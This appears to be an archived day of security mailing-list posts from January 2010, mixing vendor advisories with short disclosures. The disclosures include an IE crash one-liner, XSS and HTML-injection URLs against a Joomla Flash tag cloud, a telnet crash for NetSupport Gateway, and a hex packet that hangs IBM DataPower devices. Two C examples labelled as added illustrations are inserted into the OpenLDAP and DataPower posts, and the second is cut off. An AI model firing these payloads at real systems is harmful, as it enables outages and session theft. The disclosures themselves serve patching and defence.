[USN-890-4] PyXML vulnerabilities

2010-01-26 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-890-4   January 26, 2010
python-xml vulnerabilities
CVE-2009-3560, CVE-2009-3720
===

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  python2.4-xml   0.8.4-1ubuntu3.1

After a standard system upgrade you need to restart any applications that
use PyXML to effect the necessary changes.

Details follow:

USN-890-1 fixed vulnerabilities in Expat. This update provides the
corresponding updates for PyXML.

Original advisory details:

 Jukka Taimisto, Tero Rontti and Rauli Kaksonen discovered that Expat did
 not properly process malformed XML. If a user or application linked against
 Expat were tricked into opening a crafted XML file, an attacker could cause
 a denial of service via application crash. (CVE-2009-2625, CVE-2009-3720)
 
 It was discovered that Expat did not properly process malformed UTF-8
 sequences. If a user or application linked against Expat were tricked into
 opening a crafted XML file, an attacker could cause a denial of service via
 application crash. (CVE-2009-3560)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python-xml_0.8.4-1ubuntu3.1.diff.gz
      Size/MD5:    26092 7b735067d5b8494bfa9479a38b1f971f
    http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python-xml_0.8.4-1ubuntu3.1.dsc
      Size/MD5:      663 064ad0d03d81132088df42f78850bfd7
    http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python-xml_0.8.4.orig.tar.gz
      Size/MD5:   734751 04fc1685542b32c1948c2936dfb6ba0e

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python-xml_0.8.4-1ubuntu3.1_all.deb
      Size/MD5:    11568 253250bca793d626d3f651a116259b00
    http://security.ubuntu.com/ubuntu/pool/universe/p/python-xml/xbel-utils_0.8.4-1ubuntu3.1_all.deb
      Size/MD5:    25206 e73978eb774cf39690739f0908fb32dc
    http://security.ubuntu.com/ubuntu/pool/universe/p/python-xml/xbel_0.8.4-1ubuntu3.1_all.deb
      Size/MD5:    24392 e4bab68a86bd7fb0dd85d39268716a64

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python2.4-xml_0.8.4-1ubuntu3.1_amd64.deb
      Size/MD5:   717460 763ab0e82cbd3767958753060145c5ab

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python2.4-xml_0.8.4-1ubuntu3.1_i386.deb
      Size/MD5:   708074 e34c9a1bdaaef83eb885104360d9e94f

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python2.4-xml_0.8.4-1ubuntu3.1_powerpc.deb
      Size/MD5:   716638 8ee8326bb735b20b18f0335c4485aadb

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/p/python-xml/python2.4-xml_0.8.4-1ubuntu3.1_sparc.deb
      Size/MD5:   706208 11751f3c1654c648dd145c88afc3002c

Re: Re: e107 latest download link is backdoored

2010-01-26 Thread track
On the website you can see:
"We were recently informed of a very nasty exploit that, as far as we can see, 
affects almost all e107 0.7 releases. Everyone running e107 needs to get their 
sites updated as soon as possible. If you are a site owner and you are unable 
to upgrade for some reason (too much hacked core code), please contact me 
directly and I can help you with a quick-fix. ..." 
and you can also see that the website was modified ... ( script and a lot of 
links before the  ... ) 
and some other stuff on the main page doesn't seem very good .. so if you know 
how to contact them ... please do it :)


Re: [Full-disclosure] e107 latest download link is backdoored

2010-01-26 Thread Fernando Augusto

Fun stuff...

From here (Brazil) neither I nor anyone I asked, even through 
different carriers, is getting this kind of data while looking at 
http://e107.org/news.php. I am not someone that talks here, but I 
believe that it should be looked at with more care. I use Sophos here (up 
to date) and no warning was sent, so it gave me something to wonder about...


If someone wishes, I can pvt the content we got here from the site to 
compare...


Best Regards,

Fernando Augusto

Gregor Schneider wrote:

Seems as if e107.org now is spreading some bad stuff:

Virus/Spyware Mal/ObfJS-CB! - at least that's what Sophos is telling me

Wondering why the admins of e107.org still keep this site up & running
- the site should have been taken down right after they saw that it was
compromised.

Irresponsible from the e107.org-guys, imho...

Gregor


RE: Microsoft IE 6&7 Crash Exploit

2010-01-26 Thread Santhosh
Hi,

Can this exploit be used for remote code execution???

-Santhosh

-Original Message-
From: i...@securitylab.ir [mailto:i...@securitylab.ir] 
Sent: Tuesday, January 26, 2010 5:06 PM
To: bugtraq@securityfocus.com
Subject: Microsoft IE 6&7 Crash Exploit

#
# Securitylab.ir
#
# Application Info:
# Name: Microsoft IE
# Version: 6 & 7
# Tested on : XP(SP1/SP2/SP3)
#
# Vulnerability Info:
# Type: Crash
# Risk: Medium
#
Vulnerability:

IE.html
document.createElement("html").outerHTML
#
# Discovered By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: info[at]securitylab.ir & whh_i...@yahoo.com
###



[SECURITY] [DSA 1978-1] New phpgroupware packages fix several vulnerabilities

2010-01-26 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA-1978-1  secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
January 26, 2010  http://www.debian.org/security/faq
- 

Package: phpgroupware
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2009-4414 CVE-2009-4415 CVE-2009-4416

Several remote vulnerabilities have been discovered in phpgroupware, a
Web based groupware system written in PHP. The Common Vulnerabilities 
and Exposures project identifies the following problems:

CVE-2009-4414

An SQL injection vulnerability was found in the authentication
module.

CVE-2009-4415

Multiple directory traversal vulnerabilities were found in the
addressbook module.

CVE-2009-4416

The authentication module is affected by cross-site scripting.


For the stable distribution (lenny) these problems have been fixed in
version 0.9.16.012+dfsg-8+lenny1.

For the unstable distribution (sid) these problems have been fixed in
version 0.9.16.012+dfsg-9.

We recommend that you upgrade your phpgroupware packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 5.0 alias lenny
- 

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, 
mips, mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.012+dfsg.orig.tar.gz
    Size/MD5 checksum: 19383160 bbfcfa12aca69b4032d7b4d38aeba85f
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.012+dfsg-8+lenny1.diff.gz
    Size/MD5 checksum:    70541 fc805ae50cd52606578ed95e8a5bde96
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.012+dfsg-8+lenny1.dsc
    Size/MD5 checksum:     1662 0507c4e0a6be1d93a060a7c6222c84c0

Architecture independent packages:

  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-email_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:  1167526 b7d47f4df02c98e3269fd2b8bce094f4
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-core-base_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:    48252 80a0c4bf563e576fbad0b023fcca2f4b
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-calendar_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:   268338 acdc243f1b2cbcea42a548408232657d
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-addressbook_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:   180662 e0835bac92df72541b52912e80e1e852
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:    22380 c12295c8f5f4abdf2f9d8c94ceefe4a1
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-news-admin_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:    41572 d21d4ab4ce6adbb23a46a21fd0dd67cb
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-manual_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:    93094 dc2bcd999a4a97a0acb8a0a9b156ea03
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-filemanager_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:    95206 0faba6d54c83ac610d11a256a12eec67
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-phpgwapi_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:  1522130 c4ff77bb7c80222b04ccdb130f5d2db6
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-preferences_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:    60034 b7b86ca86b431dbd7b637506db451196
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:    20228 5563f9a3d9b4835b2c89cb1ba571b23f
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-core_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:     4546 de306e6062f710d430704297106f192e
  http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-0.9.16-admin_0.9.16.012+dfsg-8+lenny1_all.deb
    Size/MD5 checksum:   192062 0427388ce20eb307946c6272856313b7
  http://secur

More information on CVE-2009-3580

2010-01-26 Thread Chris Travers
One thing not noted in the security advisory or the full disclosure
email is that there are mitigating features which can be used in
vulnerable programs (SQL-Ledger, unpatched LedgerSMB) to mitigate,
though not eliminate, the risk of XSRF.

Current versions of SQL-Ledger and LedgerSMB have a session time out
option which can be set either by the administrator or by the user.
The session timeout value provides a window during which XSRF attacks
can happen.  In environments where this is a risk (for example, not
including closed networks of POS terminals), this session timeout can
be set low enough to make the attacks impractical.

Since XSRF remains a possibility in less critical areas of the
software in LedgerSMB 1.2, it is advised that administrators take
advantage of this measure as well.

I would generally recommend that SQL-Ledger users set the timeout low,
perhaps to a value between 30 and 120.  The value refers to the
timeout in seconds, so this would require a new password after any
short break.

Properly configured, XSRF doesn't have to be a major problem with
either of these packages. However, properly configuring it poses some
significant burdens on employees, so the proper value should be
determined by each customer.  The current default value (3600), which
sets the timeout to one hour, is way too high though.  This issue
will be documented as an issue in future versions of LedgerSMB.

Best Wishes,
Chris Travers


Cross-Site Scripting vulnerability in 3D Cloud for Joomla

2010-01-26 Thread MustLive

Hello Bugtraq!

I want to warn you about a Cross-Site Scripting vulnerability in the 3D Cloud
(mod_3dcloud) plugin for Joomla, which I found and disclosed on 22.01.2010.

It is similar to the XSS vulnerability in JVClouds3D for Joomla
(http://websecurity.com.ua/3839/). I mentioned the millions of tagcloud.swf
flash files which are vulnerable to XSS attacks in my article
XSS vulnerabilities in 34 millions flash files
(http://www.webappsec.org/lists/websecurity/archive/2010-01/msg00035.html).

XSS:

http://site/modules/mod_3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

The code will execute after a click. It's strictly social XSS.

Also it's possible to conduct an HTML Injection attack, including in those 
flash files which have protection (in the flash files or via WAF) against 
javascript and vbscript URIs in the parameter tagcloud.


HTML Injection:

http://site/modules/mod_3dcloud/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

3D Cloud 1.3 and previous versions are vulnerable.

I mentioned this vulnerability on my site
(http://websecurity.com.ua/3883/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 



Paper: Weaning the Web off of Session Cookies

2010-01-26 Thread Timothy D. Morgan

Hello,

I've just posted a new paper some of you may be interested in:
  http://www.vsecurity.com/download/papers/WeaningTheWebOffOfSessionCookies.pdf 
 

While it's primarily an argument for fixing HTTP authentication, it
does contain information on a few weaknesses common in browsers,
including password manager issues and user interface vulnerabilities.

Feedback is more than welcome.

Enjoy,
tim


Abstract

In this paper, we compare the security weaknesses and usability
limitations of both cookie-based session management and HTTP digest
authentication; demonstrating how digest authentication is clearly the
more secure system in practice.  We propose several small changes in
browser behavior and HTTP standards that will make HTTP authentication
schemes, such as digest authentication, a viable option in future
application development.


[ MDVSA-2010:026 ] openldap

2010-01-26 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:026
 http://www.mandriva.com/security/
 ___

 Package : openldap
 Date: January 26, 2010
 Affected: 2008.0, 2009.0, 2009.1, Corporate 4.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability was discovered and corrected in openldap:
 
 libraries/libldap/tls_o.c in OpenLDAP, when OpenSSL is used, does
 not properly handle a '\0' (NUL) character in a domain name in
 the subject's Common Name (CN) field of an X.509 certificate, which
 allows man-in-the-middle attackers to spoof arbitrary SSL servers via
 a crafted certificate issued by a legitimate Certification Authority,
 a related issue to CVE-2009-2408 (CVE-2009-3767).
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 
 The updated packages have been patched to correct this issue.
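 The hostname check this advisory describes is a classic C pitfall: once the
 Common Name is handed to a string function, everything after the first NUL
 octet is invisible. The block below is an added illustration, not OpenLDAP's
 tls_o.c, pairing that weak C-string comparison with a length-aware one that
 treats the CN as the DER octet string it really is. The CN bytes and the
 hostnames in it are constructed placeholders.

```c
/* Added illustration (not OpenLDAP code): why a NUL octet inside a
 * certificate Common Name defeats a C-string hostname comparison, and a
 * length-aware comparison that does not. All names are constructed. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* A subject CN as an X.509 parser hands it over: DER carries an explicit
 * length, so a NUL byte is just another octet of the name. */
struct x509_name {
    const unsigned char *data;
    size_t len;
};

/* Weak check (the pattern behind the advisory's description): the CN is
 * treated as a C string, so the comparison never sees what follows the
 * first NUL and "www.example.com\0..." matches "www.example.com". */
int hostname_matches_cstring(const struct x509_name *cn, const char *host)
{
    return strcasecmp((const char *)cn->data, host) == 0;
}

/* Hardened check: a hostname never contains NUL, the whole DER length must
 * be consumed, and the comparison is case-insensitive per octet. */
int hostname_matches_len(const struct x509_name *cn, const char *host)
{
    size_t hostlen = strlen(host);

    if (memchr(cn->data, '\0', cn->len) != NULL)
        return 0;                       /* embedded NUL: reject outright */
    if (cn->len != hostlen)
        return 0;                       /* trailing octets are not ignored */
    for (size_t i = 0; i < cn->len; i++)
        if (tolower(cn->data[i]) != tolower((unsigned char)host[i]))
            return 0;
    return 1;
}

/* Constructed CN: "www.example.com" + NUL + ".attacker-controlled.test".
 * sizeof()-1 keeps the octets after the NUL, as a DER length would. */
static const unsigned char kConstructedCN[] =
    "www.example.com\0.attacker-controlled.test";
static const unsigned char kHonestCN[] = "www.example.com";

struct x509_name constructed_cn(void)
{
    struct x509_name n = { kConstructedCN, sizeof(kConstructedCN) - 1 };
    return n;
}

struct x509_name honest_cn(void)
{
    struct x509_name n = { kHonestCN, sizeof(kHonestCN) - 1 };
    return n;
}

int main(void)
{
    struct x509_name bad = constructed_cn(), good = honest_cn();
    const char *host = "www.example.com";

    printf("NUL-bearing CN: cstring=%d length-aware=%d\n",
           hostname_matches_cstring(&bad, host),
           hostname_matches_len(&bad, host));       /* 1 vs 0 */
    printf("honest CN:      cstring=%d length-aware=%d\n",
           hostname_matches_cstring(&good, host),
           hostname_matches_len(&good, host));      /* 1 vs 1 */
    return 0;
}
```

 The same rule applies to subjectAltName dNSName entries: compare against the
 encoded length, never against the position of the first NUL.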
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3767
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 05d27c8e50b79e16c345756251c5e819  2008.0/i586/libldap2.3_0-2.3.38-3.4mdv2008.0.i586.rpm
 c3b564ed72214c88e4f97b754baec0d3  2008.0/i586/libldap2.3_0-devel-2.3.38-3.4mdv2008.0.i586.rpm
 cb184b75f27937fbf10bee2c4526ccb8  2008.0/i586/libldap2.3_0-static-devel-2.3.38-3.4mdv2008.0.i586.rpm
 53a1cb617be31adf8002d03c975242df  2008.0/i586/openldap-2.3.38-3.4mdv2008.0.i586.rpm
 48114cab21906ac3f736d669ea9c1a21  2008.0/i586/openldap-clients-2.3.38-3.4mdv2008.0.i586.rpm
 a16e2a6e65d1f68eea0989590f0057b7  2008.0/i586/openldap-doc-2.3.38-3.4mdv2008.0.i586.rpm
 1184787dc8596fc25c660396d012d6eb  2008.0/i586/openldap-servers-2.3.38-3.4mdv2008.0.i586.rpm
 84c2fe50106a22d3fe27b3cdba4197d9  2008.0/i586/openldap-testprogs-2.3.38-3.4mdv2008.0.i586.rpm
 b3facfc070aee1223d254ec984c61ab7  2008.0/i586/openldap-tests-2.3.38-3.4mdv2008.0.i586.rpm
 d43ec379be752a4229b996bf0212123e  2008.0/SRPMS/openldap-2.3.38-3.4mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 fd10ca40cbd47ac92f0fb018abeb43b0  2008.0/x86_64/lib64ldap2.3_0-2.3.38-3.4mdv2008.0.x86_64.rpm
 6f70689679ee97a5c0586190b0c14fe3  2008.0/x86_64/lib64ldap2.3_0-devel-2.3.38-3.4mdv2008.0.x86_64.rpm
 804c10f2e0fc978bdaff791fffdf6cb3  2008.0/x86_64/lib64ldap2.3_0-static-devel-2.3.38-3.4mdv2008.0.x86_64.rpm
 2e9eaa2bc8024bab086d6719371c104b  2008.0/x86_64/openldap-2.3.38-3.4mdv2008.0.x86_64.rpm
 a11488a1a69f82d75bd9cbb0162810df  2008.0/x86_64/openldap-clients-2.3.38-3.4mdv2008.0.x86_64.rpm
 2f8a0560815adc858f9751d50154233b  2008.0/x86_64/openldap-doc-2.3.38-3.4mdv2008.0.x86_64.rpm
 82dba0aa278c64c7c588d468b910ed7f  2008.0/x86_64/openldap-servers-2.3.38-3.4mdv2008.0.x86_64.rpm
 37c4c53990d046d55eb37a4c89b41421  2008.0/x86_64/openldap-testprogs-2.3.38-3.4mdv2008.0.x86_64.rpm
 fb880135c85355b26e2769fadacb3563  2008.0/x86_64/openldap-tests-2.3.38-3.4mdv2008.0.x86_64.rpm
 d43ec379be752a4229b996bf0212123e  2008.0/SRPMS/openldap-2.3.38-3.4mdv2008.0.src.rpm

 Mandriva Linux 2009.0:
 1edb07acb66ec501f451ab12e82c701f  2009.0/i586/libldap2.4_2-2.4.11-3.2mdv2009.0.i586.rpm
 d89cc046166856ec10e6571646efc911  2009.0/i586/libldap2.4_2-devel-2.4.11-3.2mdv2009.0.i586.rpm
 d3895a847d8aad9d09446162b0ffcd8d  2009.0/i586/libldap2.4_2-static-devel-2.4.11-3.2mdv2009.0.i586.rpm
 069829021563439e98d464c942f8b465  2009.0/i586/openldap-2.4.11-3.2mdv2009.0.i586.rpm
 d10c57b7e4b2e47350be4ed9e0653d13  2009.0/i586/openldap-clients-2.4.11-3.2mdv2009.0.i586.rpm
 0e1cdfc7e0de6148feebdc28d7f957a5  2009.0/i586/openldap-doc-2.4.11-3.2mdv2009.0.i586.rpm
 c14ac5126b17775363da034cb68557b0  2009.0/i586/openldap-servers-2.4.11-3.2mdv2009.0.i586.rpm
 07f0a85987bcd586359852b7cad8649d  2009.0/i586/openldap-testprogs-2.4.11-3.2mdv2009.0.i586.rpm
 9a51e08fa565f830672328a0c00fc8e8  2009.0/i586/openldap-tests-2.4.11-3.2mdv2009.0.i586.rpm
 9cf49efc39d9e3b1e33d815ce4ecbb9b  2009.0/SRPMS/openldap-2.4.11-3.2mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 54e430c0735f09e81cbc01f8d6d2e0cb  2009.0/x86_64/lib64ldap2.4_2-2.4.11-3.2mdv2009.0.x86_64.rpm
 a603ee71bb23a2482ba24d9b5aa0d441  2009.0/x86_64/lib64ldap2.4_2-devel-2.4.11-3.2mdv2009.0.x86_64.rpm
 d2f3bb877cdbca3a7c19694ddf998f70  2009.0/x86_64/lib64ldap2.4_2-static-devel-2.4.11-3.2mdv2009.0.x86_64.rpm
 d5679cdc3fe1a66c67856ff7cc820e97  2009.0/x86_64/openldap-2.4.11-3.2mdv2009.0.x86_64.rpm
 f9e4916cb87578bc2ee52456b1cc8612  2009.0/x86_64/openldap-clients-2.4.11-3.2mdv2009.0.x86_64.rpm
 45c0453372a06e434c92ee6d6e565326  2009.0/x86_64/openldap-doc-2.4.11-3.2mdv2009.0.x86_64.rpm
 3688fdc6044b0c069cfddbcafb8570dd  2009.0/x86_64/openldap-servers-2.4.11-3.2mdv2009.0.x86_64.rpm
 8ccdef4f24

Netsupport gateway remote DoS

2010-01-26 Thread watcher60
Vendor: Netsupport
Product: Netsupport Manager
Vendor contacted 11 Nov 2009, fixed 11 Jan 2010 in version 10.60.0006

Netsupport gateway is a feature packaged with the netsupport manager 
product."Delivering seamless Remote Control between PCs that may be located 
behind different firewalls. The NetSupport Gateway provides a stable and secure 
method for NetSupport enabled systems to locate and communicate via http."

In all versions prior to 10.60.0006 it is possible to remotely crash the 
service by simply telnetting to the port and hitting return twice, thereby 
causing a DoS. In versions prior to 10.60.0005 this would only work from linux 
or mac hosts, however in 10.60.0005 (which was an attempt to fix the issue) it 
resulted in this working from both linux, mac & windows hosts. This variation 
was down to the differences in carriage returns between OS's. I presume that the 
root issue was providing null header information though the vendor never 
confirmed.

regards

Matthew Whitehead (watcher60)


[security bulletin] HPSBMA02477 SSRT090177 rev.4 - HP OpenView Network Node Manager (OV NNM), Remote Denial of Service (DoS)

2010-01-26 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01926980
Version: 4

HPSBMA02477 SSRT090177 rev.4 - HP OpenView Network Node Manager (OV NNM), 
Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2009-11-17
Last Updated: 2010-01-26

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential vulnerability has been identified with HP OpenView Network Node 
Manager (OV NNM). The vulnerability could be exploited remotely to create a 
Denial of Service (DoS).

References: CVE-2009-3840

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP OpenView Network Node Manager (OV NNM) v7.51, v7.53 running on HP-UX, Linux, 
Solaris, and Windows

BACKGROUND

CVSS 2.0 Base Metrics
===
  Reference        Base Vector                     Base Score
  CVE-2009-3840    (AV:N/AC:L/Au:N/C:N/I:N/A:P)    5.0
===
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Damian Frizza of Core Security Technologies 
for reporting this vulnerability to security-al...@hp.com.

RESOLUTION

HP has made archive files available to resolve the vulnerability for NNM v7.53. 
The archive files require that certain patches be installed first.

The patches are available from http://support.openview.hp.com/selfsolve/patches

Note: The patches are not available from the HP IT Resource Center (ITRC).

The archive files are available using ftp.

Host             Account   Password
ftp.usa.hp.com   sb02477   Secure12

OV NNM v7.53
Operating_System         Required_Patch              Archive_File
  SHA-1_Hash_for_Archive_File

HP-UX (IA)               PHSS_38489 or subsequent    solid_hotfix_HPUXIA.tar
  99db-fa73-51c1-98e8-c3e5-e709-4421-3586-3ab4-70b3

HP-UX (PA)               PHSS_38488 or subsequent    solid_hotfix_HPUXPA.tar
  6786-008e-f32e-6cc5-3f29-9a2a-cc87-d6b0-1fed-873b

Linux RedHatAS2.1        LXOV_00087 or subsequent    See note below
  See note below

Linux RedHat4AS-x86_64   LXOV_00088 or subsequent    solid_hotfix_Linux2.6.tar
  7508-fef1-be87-b599-1e29-07d5-7636-665c-7fec-b9fb

Solaris                  PSOV_03525 or subsequent    solid_hotfix_Solaris_rev4.tar
  4376-3d34-c6e6-3397-658a-6fd5-93e2-e0cd-1764-44b1

Windows                  NNM_01193 or subsequent     solid_hotfix_windows.zip
  5eb3-7208-bdac-dc97-09b7-59e4-ae0b-190c-d416-349d

Note: Installation instructions are in the README.txt file in each archive.

Note: The resolution for Solaris has been changed in rev.4 of this Security 
Bulletin. The ovdbcheck_hotfix_solaris.tar is no longer required. There is a 
new archive file for Solaris, solid_hotfix_Solaris_rev4.tar. That archive file 
requires PSOV_03525 or subsequent.

Note: This Security Bulletin will be revised when an archive file is available 
for Linux RedHatAS2.1.

OV NNM v7.51
Upgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.
Patch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:

Host             Account   Password
ftp.usa.hp.com   nnm_753   Update53

MANUAL ACTIONS: Yes
For NNM v7.51, upgrade to NNM v7.53 and apply the appropriate patches and 
archive files.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application 
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins 
issued by HP and lists recommended actions that may apply to a specific HP-UX 
system. It can also download patches and create a depot automatically. For more 
information see https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS (for HP-UX)

For HP-UX OV NNM 7.51 and 7.53
HP-UX B.11.31
HP-UX B.11.23 (IA)
HP-UX B.11.23 (PA)
HP-UX B.11.11
=
OVNNMgr.OVNNM-RUN,fr=B.07.50.00
action: install the patches and archive files listed in the Resolution

END AFFECTED VERSIONS (for HP-UX)

HISTORY
Version:1 (rev.1) - 17 November 2009 Initial release
Version:2 (rev.2) - 18 November 2009 Vulnerability is DoS, ftp host is 
ftp.usa.hp.com
Version:3 (rev.3) - 9 December 2009 New README.txt in solid_hotfix_Solaris.tar
Version:4 (rev.4) - 26 January 2010 New archive file 
(solid_hotfix_Solaris_rev4.tar) and patch requirement for Solaris

Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported 
product, send Email to: security-al...@hp.com
It is strongly recommended that security related information being communicated 
to HP be encrypted using PGP, especially exploit informatio

[IBM Datapower XS40] Denial of Service

2010-01-26 Thread erik
It appears it is possible to disable the IBM DataPower XS40 Security Gateway 
device by sending a malformed packet to the network interface. The device will 
hang itself up without being able to recover from it (no auto-reboot).

Tested vulnerable firmware is 3.7.2.1

Issue fixed according to vendor in 3.8.0 and better 

To trigger the effect it is necessary to have IP.destination 0.0.0.0 in the 
packet, so routing can only take place on the same subnet by inputting the 
MAC address of the targeted device. Like this ICMP packet, where 
00.14.5e.a1.b2.c3 is the target MAC address:

00 14 5e a1 b2 c3 00 11 25 82 7b 02 08 00 45 00 
00 50 4b 94 00 00 ff 01 5e f1 ac 12 65 15 00 00 
00 00 03 01 06 f6 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 
00 20 ed 58 00 00 ff 11 a9 d4 ac 12 65 15 ac 12 
65 65 01 00 00 00 29 00 cd 00 00 08 00 00

After sending this (sometimes it's necessary to send it multiple times), the 
device will hang and won't recover by itself.

Vendor's comment on this: 
http://www-01.ibm.com/support/docview.wss?rs=2362&uid=swg1IC61364
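As an added check (not from the post or from IBM), the block below decodes the
frame quoted above and confirms what the post says about it: EtherType IPv4, a
header checksum that verifies, protocol ICMP, and a destination of 0.0.0.0. That
last property never occurs in legitimate traffic, which makes it a simple
signature for an IDS or a firewall rule on the affected segment. The hex string
is the post's own dump re-embedded as a constant; the struct and function names
are mine.

```c
/* Added example (not from the original post or from IBM): decode the frame
 * quoted in the post and report the properties that make it anomalous,
 * chiefly an IPv4 destination of 0.0.0.0. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The 94-byte frame exactly as posted (Ethernet + IPv4 + ICMP). */
static const char *kPostedFrameHex =
    "00 14 5e a1 b2 c3 00 11 25 82 7b 02 08 00 45 00 "
    "00 50 4b 94 00 00 ff 01 5e f1 ac 12 65 15 00 00 "
    "00 00 03 01 06 f6 00 00 00 00 00 00 00 00 00 00 "
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 00 "
    "00 20 ed 58 00 00 ff 11 a9 d4 ac 12 65 15 ac 12 "
    "65 65 01 00 00 00 29 00 cd 00 00 08 00 00";

struct frame_report {
    size_t   len;          /* bytes decoded from the dump */
    int      ipv4;         /* EtherType 0x0800 */
    int      total_len_ok; /* IP total length matches captured payload */
    int      checksum_ok;  /* IPv4 header checksum verifies */
    uint8_t  proto;        /* 1 = ICMP */
    uint32_t src, dst;     /* host byte order */
    int      dst_is_zero;  /* destination 0.0.0.0: never valid on the wire */
};

/* Parse "xx xx ..." into bytes; returns count, or -1 on malformed input. */
int hex_to_bytes(const char *hex, uint8_t *out, size_t max)
{
    size_t n = 0;
    while (*hex) {
        while (*hex == ' ') hex++;
        if (!*hex) break;
        if (n >= max || !isxdigit((unsigned char)hex[0]) ||
            !isxdigit((unsigned char)hex[1]))
            return -1;
        char pair[3] = { hex[0], hex[1], '\0' };
        out[n++] = (uint8_t)strtoul(pair, NULL, 16);
        hex += 2;
    }
    return (int)n;
}

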